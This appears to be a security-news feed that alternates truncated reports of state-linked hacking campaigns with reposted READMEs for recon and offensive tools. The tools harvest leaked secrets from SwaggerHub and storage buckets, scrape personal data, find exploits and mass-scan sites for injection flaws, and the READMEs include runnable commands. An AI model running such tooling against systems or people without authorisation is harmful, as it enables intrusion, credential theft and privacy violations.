
China-Linked Hackers Used ROOTROT Webshell in MITRE Network Intrusion

The MITRE Corporation has offered more details on the recently disclosed cyber attack, stating that the first evidence of the intrusion now dates back to December 31, 2023. The attack, which came to light last month, singled out MITRE's Networked Experimentation, Research, and Virtualization Environment (NERVE) through the exploitation of two Ivanti Connect Secure zero-day

Sicat - The Useful Exploit Finder

By: Zion3R

Introduction

SiCat is an advanced exploit search tool designed to identify and gather information about exploits from both open sources and local repositories. With a focus on cybersecurity, SiCat lets users quickly search online for potential vulnerabilities and relevant exploits for ongoing projects or systems.

SiCat's main strength lies in its ability to traverse both online and local resources to collect information about relevant exploits. This aids cybersecurity professionals and researchers in understanding potential security risks and provides valuable insights to enhance system security.


SiCat Resources

Installation

git clone https://github.com/justakazh/sicat.git && cd sicat

pip install -r requirements.txt

Usage


~$ python sicat.py --help

Command Line Options:

Command Description
-h Show help message and exit
-k KEYWORD Keyword to search for
-kv KEYWORD_VERSION Keyword version to search for
-nm Identify via nmap output
--nvd Use NVD as info source
--packetstorm Use PacketStorm as info source
--exploitdb Use ExploitDB as info source
--exploitalert Use ExploitAlert as info source
--msfmodule Use Metasploit as info source
-o OUTPUT Path to save output to
-ot OUTPUT_TYPE Output file type: json or html

Examples

From keyword


python sicat.py -k telerik --exploitdb --msfmodule

From nmap output


nmap --open -sV localhost -oX nmap_out.xml
python sicat.py -nm nmap_out.xml --packetstorm
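
For reference, the -nm flag consumes standard nmap XML. As a rough illustration of the data SiCat matches keywords against, here is a minimal Python sketch (not SiCat's actual code) that pulls service names and versions out of such a report:

import xml.etree.ElementTree as ET

# Parse the nmap XML report produced by: nmap --open -sV localhost -oX nmap_out.xml
tree = ET.parse("nmap_out.xml")
for port in tree.getroot().iter("port"):
    service = port.find("service")
    if service is not None:
        # Product/version pairs are the kind of keywords you could also feed to -k/-kv
        print(service.get("product"), service.get("version"))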

To-do

  • [ ] Input from nmap results via pipeline
  • [ ] Nmap multiple host support
  • [ ] Search NSE Script
  • [ ] Search by PORT

Contribution

I'm aware that perfection is elusive in coding. If you come across any bugs, feel free to contribute by fixing the code or suggesting new features. Your input is always welcomed and valued.



Russian Hackers Using TinyTurla-NG to Breach European NGO's Systems

The Russia-linked threat actor known as Turla infected several systems belonging to an unnamed European non-governmental organization (NGO) in order to deploy a backdoor called TinyTurla-NG (TTNG). "The attackers compromised the first system, established persistence and added exclusions to antivirus products running on these endpoints as part of their preliminary post-compromise actions," Cisco

From Deepfakes to Malware: AI's Expanding Role in Cyber Attacks

Large language models (LLMs) powering artificial intelligence (AI) tools today could be exploited to develop self-augmenting malware capable of bypassing YARA rules. "Generative AI can be used to evade string-based YARA rules by augmenting the source code of small malware variants, effectively lowering detection rates," Recorded Future said in a new report shared with The Hacker News.

Dorkish - Chrome Extension Tool For OSINT & Recon

By: Zion3R


During the reconnaissance phase or when doing OSINT, we often use Google dorking and Shodan, hence the idea for Dorkish.
Dorkish is a Chrome extension that facilitates custom dork creation for Google and Shodan using its builder, and it offers prebuilt dorks for efficient reconnaissance and OSINT engagements.


Installation And Setup

1- Clone the repository

git clone https://github.com/yousseflahouifi/dorkish.git

2- Go to chrome://extensions/ and enable the Developer mode in the top right corner.
3- Click on the Load unpacked extension button and select the dorkish folder.

Note: Firefox users can find the extension here: https://addons.mozilla.org/en-US/firefox/addon/dorkish/

Features

Google dorking

  • Builder with keywords to filter your Google search results.
  • Prebuilt dorks for bug bounty programs.
  • Prebuilt dorks used during the reconnaissance phase in bug bounty.
  • Prebuilt dorks for exposed files and directories.
  • Prebuilt dorks for login and signup portals.
  • Prebuilt dorks for cybersecurity jobs.

Shodan dorking

  • Builder with filter keywords used in Shodan.
  • Variety of prebuilt dorks to find IoT devices, network infrastructure, cameras, ICS, databases, etc.

Usage

Once you have found or built the dork you need, simply select it and click Search. This will direct you to the desired search engine, Shodan or Google, with the specific dork you've chosen, where you can explore the results that match your query.
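
For illustration, here are the kinds of queries the builder produces (these two examples are mine, not bundled dorks). A Google dork narrows results by site and URL contents, while a Shodan query filters indexed hosts by banner attributes:

site:example.com inurl:login
http.title:"dashboard" port:8080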

TODO

  • Add more useful dorks and categories
  • Fix some bugs
  • Add a search bar to search through the results
  • Might add some LLM models to build dorks

Notes

I have built some dorks and used some public resources to gather others; here are a few: - https://github.com/lothos612/shodan - https://github.com/TakSec/google-dorks-bug-bounty

Warning

  • I am not responsible for any damage caused by using the tool


swaggerHole - A Python3 Script Searching For Secrets On SwaggerHub

By: Zion3R


Introduction

This tool automates the process of retrieving secrets in the public APIs on swaggerHub (https://app.swaggerhub.com/search). It is multithreaded, and a pipe mode is available :)

Requirements

  • python3 (sudo apt install python3)
  • pip3 (sudo apt install python3-pip)

Installation

pip3 install swaggerhole

or clone this repository and run

git clone https://github.com/Liodeus/swaggerHole.git
pip3 install .

Usage

   _____ _      __ ____ _ ____ _ ____ _ ___   _____
/ ___/| | /| / // __ `// __ `// __ `// _ \ / ___/
(__ ) | |/ |/ // /_/ // /_/ // /_/ // __// /
/____/ |__/|__/ \__,_/ \__, / \__, / \___//_/
__ __ __ /____/ /____/
/ / / /____ / /___
/ /_/ // __ \ / // _ \
/ __ // /_/ // // __/
/_/ /_/ \____//_/ \___/

usage: swaggerhole [-h] [-s SEARCH] [-o OUT] [-t THREADS] [-j] [-q] [-du] [-de]

optional arguments:
-h, --help show this help message and exit
-s SEARCH, --search SEARCH
Term to search
-o OUT, --out OUT Output directory
-t THREADS, --threads THREADS
Threads number (Default 25)
-j, --json Json output
-q, --quiet Remove banner
-du, --deactivate_url
Deactivate the URL filtering
-de, --deactivate_email
Deactivate the email filtering

Search for secrets about a domain

swaggerHole -s test.com

echo test.com | swaggerHole

Search for secrets about a domain and output to JSON

swaggerHole -s test.com --json

echo test.com | swaggerHole --json

Search for secrets about a domain and do it fast :)

swaggerHole -s test.com -t 100

echo test.com | swaggerHole -t 100

Output explanation

Normal output

`Finding_Type - Finding - [Swagger_Name][Date_Last_Update][Line:Number]`

Json output

Β `{"Finding_Type": Finding, "File": File_path, "Date": Date_Last_Update, "Line": Number}`Β 

Deactivate url/email

Using -du or -de removes the filtering done by the tool. There are more false positives with those options.
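
As a sketch of how the JSON output can be consumed downstream, assuming the tool writes one JSON object per line in the format above (the file name here is illustrative):

import json

# Group swaggerHole JSON findings by their type
findings = {}
with open("findings.json") as fh:
    for line in fh:
        line = line.strip()
        if line:
            entry = json.loads(line)
            findings.setdefault(entry["Finding_Type"], []).append(entry)

for finding_type, entries in findings.items():
    print(f"{finding_type}: {len(entries)} finding(s)")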

Chinese Hackers Operate Undetected in U.S. Critical Infrastructure for Half a Decade

The U.S. government on Wednesday said the Chinese state-sponsored hacking group known as Volt Typhoon had been embedded into some critical infrastructure networks in the country for at least five years. Targets of the threat actor include communications, energy, transportation, and water and wastewater systems sectors in the U.S. and Guam. "Volt Typhoon's choice of targets and pattern

After FBI Takedown, KV-Botnet Operators Shift Tactics in Attempt to Bounce Back

The threat actors behind the KV-botnet made "behavioral changes" to the malicious network as U.S. law enforcement began issuing commands to neutralize the activity. KV-botnet is the name given to a network of compromised small office and home office (SOHO) routers and firewall devices across the world, with one specific cluster acting as a covert data transfer system for other Chinese

BucketLoot - An Automated S3-compatible Bucket Inspector

By: Zion3R


BucketLoot is an automated S3-compatible Bucket inspector that can help users extract assets, flag secret exposures and even search for custom keywords as well as Regular Expressions from publicly-exposed storage buckets by scanning files that store data in plain-text.

The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.

BucketLoot comes with a guest mode by default, which means a user doesn't need to specify any API tokens / Access Keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response; if the storage bucket contains more than 1000 entries the user would like to scan, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.

Features

Secret Scanning

Scans for 80+ unique RegEx signatures that can help uncover secret exposures, tagged with their severity, in the misconfigured storage bucket. Users can modify or add their own signatures in the regexes.json file. If you have any cool signatures that might be helpful to others and could be flagged at scale, go ahead and make a PR!
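
Conceptually, this kind of signature scanning is a named regex list with severities run over each plain-text file. A minimal sketch of the idea (the signatures below are illustrative, not BucketLoot's actual regexes.json entries):

import re

# Illustrative signatures: name -> (pattern, severity)
SIGNATURES = {
    "AWS Access Key ID": (r"AKIA[0-9A-Z]{16}", "high"),
    "Google API Key": (r"AIza[0-9A-Za-z_\-]{35}", "medium"),
}

def scan_text(text):
    for name, (pattern, severity) in SIGNATURES.items():
        for match in re.finditer(pattern, text):
            yield name, severity, match.group(0)

with open("bucket_file.txt") as fh:
    for name, severity, secret in scan_text(fh.read()):
        print(f"[{severity}] {name}: {secret}")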

Sensitive File Checks

Accidental sensitive file leaks are a big problem that affects the security posture of individuals and organisations. BucketLoot comes with an 80+ unique regEx signature list in vulnFiles.json that allows users to flag these sensitive files based on file names or extensions.

Dig Mode

Want to quickly check if any target website is using a misconfigured bucket that is leaking secrets or any other sensitive data? Dig Mode allows you to pass non-S3 targets and let the tool scrape URLs from response body for scanning.

Asset Extraction

Interested in stepping up your asset discovery game? BucketLoot extracts all the URLs, subdomains and domains present in an exposed storage bucket, giving you a chance to discover hidden endpoints and an edge over traditional recon tools.

Searching

The tool goes beyond just asset discovery and secret exposure scanning by letting users search for custom keywords and even Regular Expression queries which may help them find exactly what they are looking for.

To know more about our Attack Surface Management platform, check out NVADR.



Uscrapper - Powerful OSINT Webscraper For Personal Data Collection

By: Zion3R


Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, and supports multithreading to make this process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypass modules and supports web crawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
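
The underlying technique is straightforward: fetch the page and run targeted regular expressions over the HTML. A minimal sketch of the idea (simplified patterns, not Uscrapper's actual code):

import re
import urllib.request

html = urllib.request.urlopen("https://example.com").read().decode("utf-8", "ignore")

# Simplified patterns for email addresses and social media links
emails = set(re.findall(r"[\w.+-]+@[\w-]+\.[\w.-]+", html))
socials = set(re.findall(r"https?://(?:www\.)?(?:twitter|linkedin|facebook|instagram)\.com/[\w/.-]+", html))

print("Emails:", emails)
print("Social links:", socials)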


Extracted Details:

Uscrapper extracts the following details from the provided website:

  • Email Addresses: Displays email addresses found on the website.
  • Social Media Links: Displays links to various social media platforms found on the website.
  • Author Names: Displays the names of authors associated with the website.
  • Geolocations: Displays geolocation information associated with the website.
  • Non-Hyperlinked Details: Displays non-hyperlinked details found on the website, including email addresses, phone numbers, and usernames.

Whats New?:

Uscrapper 2.0:

  • Introduced multiple modules to bypass anti-web-scraping techniques.
  • Introduced Crawl and Scrape: an advanced crawl-and-scrape module to scrape websites from within.
  • Implemented multithreading to make these processes faster.

Installation Steps:

git clone https://github.com/z0m31en7/Uscrapper.git
cd Uscrapper/install/ 
chmod +x ./install.sh && ./install.sh #For Unix/Linux systems

Usage:

To run Uscrapper, use the following command-line syntax:

python Uscrapper-v2.0.py [-h] [-u URL] [-c (INT)] [-t THREADS] [-O] [-ns]


Arguments:

  • -h, --help: Show the help message and exit.
  • -u URL, --url URL: Specify the URL of the website to extract details from.
  • -c INT, --crawl INT: Specify the number of links to crawl.
  • -t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
  • -O, --generate-report: Generate a report file containing the extracted details.
  • -ns, --nonstrict: Display non-strict usernames during extraction.

Note:

  • Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.

  • The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.

  • To bypass some anti-web-scraping methods we have used Selenium, which can make the overall process slower.

Contribution:

Want a new feature to be added?

  • Make a pull request with all the necessary details and it will be merged after a review.
  • You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.


WebCopilot - An Automation Tool That Enumerates Subdomains, Then Filters Out XSS, SQLi, Open Redirect, LFI, SSRF And RCE Parameters, And Then Scans For Vulnerabilities

By: Zion3R


WebCopilot is an automation tool designed to enumerate subdomains of the target and detect bugs using different open-source tools.

The script first enumerates all the subdomains of the given target domain using assetfinder, Sublist3r, subfinder, amass, findomain, hackertarget, riddler and crt.sh, then performs active subdomain enumeration using gobuster with a SecLists wordlist. It filters out the live subdomains using dnsx, extracts the subdomains' titles using httpx, and scans for subdomain takeover using subjack. It then uses gauplus and waybackurls to crawl all the endpoints of those subdomains, applies gf patterns to filter out XSS, LFI, SSRF, SQLi, open redirect and RCE parameters, and scans for vulnerabilities on the subdomains using different open-source tools (like kxss, dalfox, openredirex, nuclei, etc.). Finally, it prints the result of the scan and saves all the output in a specified directory.
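
As an illustration of one step in that pipeline, filtering enumerated names down to live subdomains is essentially a DNS resolution check (dnsx does this far faster and concurrently; this Python sketch only shows the idea):

import socket

with open("subdomains.txt") as fh:
    for name in (line.strip() for line in fh):
        if not name:
            continue
        try:
            socket.gethostbyname(name)  # resolves, so consider it alive
            print(name)
        except socket.gaierror:
            pass  # no DNS record, drop it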


Features

Usage

g!2m0:~ webcopilot -h
             
──────▄▀▄─────▄▀▄
β”€β”€β”€β”€β”€β–„β–ˆβ–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–ˆβ–„
β”€β–„β–„β”€β”€β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ”€β”€β–„β–„
β–ˆβ–„β–„β–ˆβ”€β–ˆβ–‘β–‘β–€β–‘β–‘β”¬β–‘β–‘β–€β–‘β–‘β–ˆβ”€β–ˆβ–„β–„β–ˆ
β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•
β–‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β–ˆβ–ˆβ•‘β–‘β–‘β•šβ•β•β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–‘β–ˆβ–ˆβ•”β•β•β•β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘β•šβ•β•β–‘β–‘β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β• β–‘β•šβ•β•β•β•β•β–‘β•šβ•β•β–‘β–‘β–‘β–‘β–‘β•šβ•β•β•šβ•β•β•β•β•β•β•β–‘β•šβ•β•β•β•β•β–‘β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘
[●] @h4r5h1t.hrs | G!2m0

Usage:
webcopilot -d <target>
webcopilot -d <target> -s
webcopilot [-d target] [-o output destination] [-t threads] [-b blind server URL] [-x exclude domains]

Flags:
-d Add your target [Required]
-o To save outputs in folder [Default: domain.com]
-t Number of threads [Default: 100]
-b Add your server for BXSS [Default: False]
-x Exclude out of scope domains [Default: False]
-s Run only Subdomain Enumeration [Default: False]
-h Show this help message

Example: webcopilot -d domain.com -o domain -t 333 -x exclude.txt -b testServer.xss
Use https://xsshunter.com/ or https://interact.projectdiscovery.io/ to get your server

Installing WebCopilot

WebCopilot requires git to install successfully. Run the following command as root to install webcopilot:

git clone https://github.com/h4r5h1t/webcopilot && cd webcopilot/ && chmod +x webcopilot install.sh && mv webcopilot /usr/bin/ && ./install.sh

Tools Used:

SubFinder β€’ Sublist3r β€’ Findomain β€’ gf β€’ OpenRedireX β€’ dnsx β€’ sqlmap β€’ gobuster β€’ assetfinder β€’ httpx β€’ kxss β€’ qsreplace β€’ Nuclei β€’ dalfox β€’ anew β€’ jq β€’ aquatone β€’ urldedupe β€’ Amass β€’ gauplus β€’ waybackurls β€’ crlfuzz

Running WebCopilot

To run the tool on a target, just use the following command.

g!2m0:~ webcopilot -d bugcrowd.com

The -o flag can be used to specify an output directory.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd

The -s flag can be used to run only subdomain enumeration (active + passive, also grabbing titles & screenshots).

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -s 

The -t flag can be used to add threads to your scan for faster results.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 

The -b flag can be used for blind XSS (OOB); you can get your server from xsshunter or interact.

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -b testServer.xss

The -x flag can be used to exclude out-of-scope domains.

g!2m0:~ echo out.bugcrowd.com > excludeDomain.txt
g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd -t 333 -x excludeDomain.txt -b testServer.xss

Example

Default options look like this:

g!2m0:~ webcopilot -d bugcrowd.com -o bugcrowd
                                ──────▄▀▄─────▄▀▄
β”€β”€β”€β”€β”€β–„β–ˆβ–‘β–‘β–€β–€β–€β–€β–€β–‘β–‘β–ˆβ–„
β”€β–„β–„β”€β”€β–ˆβ–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ”€β”€β–„β–„
β–ˆβ–„β–„β–ˆβ”€β–ˆβ–‘β–‘β–€β–‘β–‘β”¬β–‘β–‘β–€β–‘β–‘β–ˆβ”€β–ˆβ–„β–„β–ˆ
β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•—β–‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—
β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•
β–‘β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β–ˆ β–ˆβ–ˆβ–ˆβ•—β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β–ˆβ–ˆβ•‘β–‘β–‘β•šβ•β•β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ•‘β–‘β–ˆβ–ˆβ•”β•β•β•β–‘β–‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•β•β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘ β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β•šβ–ˆβ–ˆβ•”β•β–‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•¦β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–‘β–‘β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–‘β–‘β–‘β–ˆβ–ˆβ•‘β–‘β–‘β–‘
β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘β•šβ•β•β–‘β–‘β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β•β–‘β–‘β•šβ•β•β•β•β•β–‘β•šβ•β•β–‘β–‘β–‘ β–‘β•šβ•β•β•šβ•β•β•β•β•β•β•β–‘β•šβ•β•β•β•β•β–‘β–‘β–‘β–‘β•šβ•β•β–‘β–‘β–‘
[●] @h4r5h1t.hrs | G!2m0


[❌] Warning: Use with caution. You are responsible for your own actions.
[❌] Developers assume no liability and are not responsible for any misuse or damage caused by this tool.


Target: bugcrowd.com
Output: /home/gizmo/targets/bugcrowd
Threads: 100
Server: False
Exclude: False
Mode: Running all Enumeration
Time: 30-08-2021 15:10:00

[!] Please wait while scanning...

[●] Subdomain Scanning is in progress: Scanning subdomains of bugcrowd.com
[●] Subdomain Scanned - [assetfinderβœ”] Subdomain Found: 34
[●] Subdomain Scanned - [sublist3rβœ”] Subdomain Found: 29
[●] Subdomain Scanned - [subfinderβœ”] Subdomain Found: 54
[●] Subdomain Scanned - [amassβœ”] Subdomain Found: 43
[●] Subdomain Scanned - [findomainβœ”] Subdomain Found: 27

[●] Active Subdomain Scanning is in progress:
[!] Please be patient. This may take a while...
[●] Active Subdomain Scanned - [gobusterβœ”] Subdomain Found: 11
[●] Active Subdomain Scanned - [amassβœ”] Subdomain Found: 0

[●] Subdomain Scanning: Filtering out of scope subdomains
[●] Subdomain Scanning: Filtering Alive subdomains
[●] Subdomain Scanning: Getting titles of valid subdomains
[●] Visual inspection of Subdomains is completed. Check: /subdomains/aquatone/

[●] Scanning Completed for Subdomains of bugcrowd.com Total: 43 | Alive: 30

[●] Endpoints Scanning Completed for Subdomains of bugcrowd.com Total: 11032
[●] Vulnerabilities Scanning is in progress: Getting all vulnerabilities of bugcrowd.com
[●] Vulnerabilities Scanned - [XSSβœ”] Found: 0
[●] Vulnerabilities Scanned - [SQLiβœ”] Found: 0
[●] Vulnerabilities Scanned - [LFIβœ”] Found: 0
[●] Vulnerabilities Scanned - [CRLFβœ”] Found: 0
[●] Vulnerabilities Scanned - [SSRFβœ”] Found: 0
[●] Vulnerabilities Scanned - [Sensitive Dataβœ”] Found: 0
[●] Vulnerabilities Scanned - [Open redirectβœ”] Found: 0
[●] Vulnerabilities Scanned - [Subdomain Takeoverβœ”] Found: 0
[●] Vulnerabilities Scanned - [Nucleiβœ”] Found: 0
[●] Vulnerabilities Scanning Completed for Subdomains of bugcrowd.com Check: /vulnerabilities/


β–’β–ˆβ–€β–€β–ˆ β–ˆβ–€β–€ β–ˆβ–€β–€ β–ˆβ–‘β–‘β–ˆ β–ˆβ–‘β–‘ β–€β–€β–ˆβ–€β–€
β–’β–ˆβ–„β–„β–€ β–ˆβ–€β–€ β–€β–€β–ˆ β–ˆβ–‘β–‘β–ˆ β–ˆβ–‘β–‘ β–‘β–‘β–ˆβ–‘β–‘
β–’β–ˆβ–‘β–’β–ˆ β–€β–€β–€ β–€β–€β–€ β–‘β–€β–€β–€ β–€β–€β–€ β–‘β–‘β–€β–‘β–‘

[+] Subdomains of bugcrowd.com
[+] Subdomains Found: 0
[+] Subdomains Alive: 0
[+] Endpoints: 11032
[+] XSS: 0
[+] SQLi: 0
[+] Open Redirect: 0
[+] SSRF: 0
[+] CRLF: 0
[+] LFI: 0
[+] Sensitive Data: 0
[+] Subdomain Takeover: 0
[+] Nuclei: 0

Acknowledgement

WebCopilot is inspired by Garud & Pinaak by ROX4R.

Thanks to the authors of the tools & wordlists used in this script.

@aboul3la @tomnomnom @lc @hahwul @projectdiscovery @maurosoria @shelld3v @devanshbatham @michenriksen @defparam @projectdiscovery @bp0lr @ameenmaali @sqlmapproject @dwisiswant0 @OWASP @OJ @Findomain @danielmiessler @1ndianl33t @ROX4R

Warning: Developers assume no liability and are not responsible for any misuse or damage caused by this tool. Please use it with caution, because you are responsible for your own actions.


CERT-UA Uncovers New Malware Wave Distributing OCEANMAP, MASEPIE, STEELHOOK

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the Russia-linked APT28 group to deploy previously undocumented malware such as OCEANMAP, MASEPIE, and STEELHOOK to harvest sensitive information. The activity, which was detected by the agency between December 15 and 25, 2023, targeted Ukrainian

Russian SVR-Linked APT29 Targets JetBrains TeamCity Servers in Ongoing Attacks

Threat actors affiliated with the Russian Foreign Intelligence Service (SVR) have targeted unpatched JetBrains TeamCity servers in widespread attacks since September 2023. The activity has been tied to a nation-state group known as APT29, which is also tracked as BlueBravo, Cloaked Ursa, Cozy Bear, Midnight Blizzard (formerly Nobelium), and The Dukes. It's notable for the supply chain

New Threat Actor 'AeroBlade' Emerges in Espionage Attack on U.S. Aerospace

A previously undocumented threat actor has been linked to a cyber attack targeting an aerospace organization in the U.S. as part of what's suspected to be a cyber espionage mission. The BlackBerry Threat Research and Intelligence team is tracking the activity cluster as AeroBlade. Its origin is currently unknown and it's not clear if the attack was successful. "The actor used spear-phishing

OSINT-Framework - OSINT Framework

By: Zion3R


OSINT framework focused on gathering information from free tools or resources. The intention is to help people find free OSINT resources. Some of the sites included might require registration or offer more data for $$$, but you should be able to get at least a portion of the available information for no cost.
